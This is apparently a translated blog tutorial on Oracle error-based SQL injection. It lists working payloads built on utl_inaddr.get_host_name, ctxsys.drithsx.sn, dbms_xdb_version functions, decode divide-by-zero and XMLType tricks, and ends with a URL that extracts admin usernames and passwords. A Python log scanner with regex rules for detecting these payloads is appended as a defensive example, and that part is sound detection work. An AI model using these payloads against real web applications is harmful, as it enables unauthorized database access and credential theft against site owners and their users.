Oracle database error-based injection

0X01

Error-based injection works by comparing a value with an expression that raises an error, for example 1=[error statement] or 1>[error statement]. The functions that can be made to raise an error depend on the database (MySQL is limited to a few specific functions); MSSQL is injected in a similar way.

news.jsp?id=1 and 1=1    page returns correctly
news.jsp?id=1 and 1=2    page returns an error

Once an injection point has been found and the page displays error information, we can try error-based injection.

0X02 Error injection functions

utl_inaddr.get_host_name() for error-based injection

and 1=utl_inaddr.get_host_name((select table_name from user_tables where rownum=1))

utl_inaddr.get_host_address is intended to obtain an IP address, but if the parameter you pass cannot be resolved, Oracle returns an error that displays the parameter that was passed.

Our parameter is the result of a SQL statement, so the returned error message contains the result of executing that statement. After Oracle starts, a number of system variables are kept in specific views; you can use these views to get what you want, and they usually contain very important information.

0x002 ctxsys.drithsx.sn() for error-based injection

?id=1 and 1=ctxsys.drithsx.sn(1,(select user from dual))

0x03 dbms_xdb_version.checkin()

and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null

0x04 dbms_xdb_version.makeversioned()

and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null

0x05 dbms_xdb_version.uncheckout()

and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null

0x06 dbms_utility.sqlid_to_sqlhash()

and (SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null

0x06 ordsys.ord_dicom.getmappingxpath()

and 1=ordsys.ord_dicom.getmappingxpath((select table_name from user_tables where rownum=1))

0x07 decode() for error-based injection. This method does not echo the query result back through the error message; it is only used as a way to judge the result from the page behaving differently.

and 1=(select decode(substr(user,1,1),'S',(1/0),0) from dual)    when the character matches, the page returns an error
?id=1 and 1=(select decode(substr(user,1,1),'s',(1/0),0) from dual)

0x08 XMLType. When using XMLType to trigger an error, many people do not know why chr(60) is used. Looking up the ASCII table shows 60 is '<', 58 is ':' and 62 is '>'. Checking the related API shows that XMLType must start with '<' and end with '>' when it is parsed, and the colon here is indispensable; as for why it has to be a colon, I have not found an explanation. Also note that if the returned data contains a space, it is automatically truncated and the data comes back incomplete; replacing the space with another non-blank character using the replace function solves this.

and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null

0x02 Using the error functions to inject data

Error out the username and password from the admin table

http://www.jsporcle.com/news.jsp?id=1 and 1=utl_inaddr.get_host_name((select (select username%7c%7cpassword from admin)from dual))--

The other error functions work in much the same way.
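As an added defensive example (not from the original post): a small Python log scanner that flags requests carrying the Oracle error-injection functions listed above. The rule labels and the access-log lines are constructed for the demonstration; only the function names come from the page.

```python
import re
from urllib.parse import unquote_plus

# Oracle functions used for error-based injection in the post above (names from the page).
RULES = {
    "utl_inaddr": r"utl_inaddr\.get_host_(?:name|address)",
    "ctxsys.drithsx.sn": r"ctxsys\.drithsx\.sn",
    "dbms_xdb_version": r"dbms_xdb_version\.(?:checkin|makeversioned|uncheckout)",
    "dbms_utility.sqlid_to_sqlhash": r"dbms_utility\.sqlid_to_sqlhash",
    "ordsys.ord_dicom.getmappingxpath": r"ordsys\.ord_dicom\.getmappingxpath",
    "xmltype-chr60": r"xmltype\s*\(\s*chr\s*\(\s*60\s*\)",  # XMLType(chr(60)||...||chr(62)) trick
    "decode-divzero": r"decode\s*\(.*?1\s*/\s*0",            # decode(..., (1/0), 0) boolean oracle
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in RULES.items()}

def normalize(query):
    """URL-decode twice (double-encoded payloads are common) and collapse whitespace."""
    text = unquote_plus(unquote_plus(query))
    return re.sub(r"\s+", " ", text)

def classify_request(url):
    """Return the labels of the rules that the URL's query string trips, in RULES order."""
    query = url.split("?", 1)[1] if "?" in url else ""
    text = normalize(query)
    return [name for name, rx in COMPILED.items() if rx.search(text)]

# Constructed sample access-log lines (not from the original post).
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2019:10:01:02 +0800] "GET /news.jsp?id=1 HTTP/1.1" 200 5120
10.0.0.7 - - [12/May/2019:10:01:09 +0800] "GET /news.jsp?id=1%20and%201=utl_inaddr.get_host_name((select%20table_name%20from%20user_tables%20where%20rownum=1)) HTTP/1.1" 500 812
10.0.0.7 - - [12/May/2019:10:01:15 +0800] "GET /news.jsp?id=1%20and%20(select%20upper(XMLType(chr(60)||chr(58)||(select%20user%20from%20dual)||chr(62)))%20from%20dual)%20is%20not%20null HTTP/1.1" 500 790
"""

# Common-log-format request line: client IP, request URL and HTTP status.
LOG_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def scan_log(log_text):
    """Return (client_ip, status, labels) for each request that trips at least one rule."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, url, status = m.groups()
        labels = classify_request(url)
        if labels:
            hits.append((ip, status, labels))
    return hits
```

A 500 status paired with one of these rule hits is the signature of a probe that reached the database; a 200 with the same payload is worth the same alert, since the decode() variant never produces an error page.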

by: thanks to 卿哥

Origin: www.cnblogs.com/-zhong/p/10951367.html